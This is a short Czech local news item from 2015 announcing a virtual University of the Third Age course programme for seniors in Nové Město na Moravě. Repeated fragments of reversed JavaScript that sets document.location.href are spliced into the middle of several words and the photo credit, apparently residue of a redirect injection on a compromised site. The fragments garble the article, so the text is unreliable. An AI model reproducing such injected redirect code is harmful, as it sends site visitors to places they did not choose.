univerzita 3. věku
Rainbow page separator

Ve Městě začne virtuální univerzita 3. věku

Pondělí, 12. ledna 2015

Vratislavovo náměstí Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Přípravným kurzem na téma astronomie v úterý 13. ledna začne v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách novoměstského domu s pečovatelskou službou přípravný kurz univerzity 3. věku. Tu zájemcům nabízí Česká zemědělská univerzita v Praze – senioři si mohou osvěžit pozapomenuté znalosti a doplnit je novými poznatky či hovořit s předními odborníky na různá témata.
Letní semestr univerzity 3. věku bude probíhat od února, přihlášky ke studiu je možné podávat do 20. ledna v Novoměstských sociálních službách. Další témata, kterým se mohou zájemci věnovat, jsou například barokní architektura v Čechách, čínská medicína v naší zahrádce, dějiny oděvní kultury, etika jako východisko z krize společnosti, evropské kulturní hodnoty, his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie a současnost české myslivosti, hudební nástroje, geometrie, lesnictví, lidské zdraví, osobní finance, pěs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování a využití jedlých a léčivých hub, potraviny a spotřebitel, umění rané renesance v Itálii, vývoj a současnost Evropské unie, vývoj informačních technologií a další.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com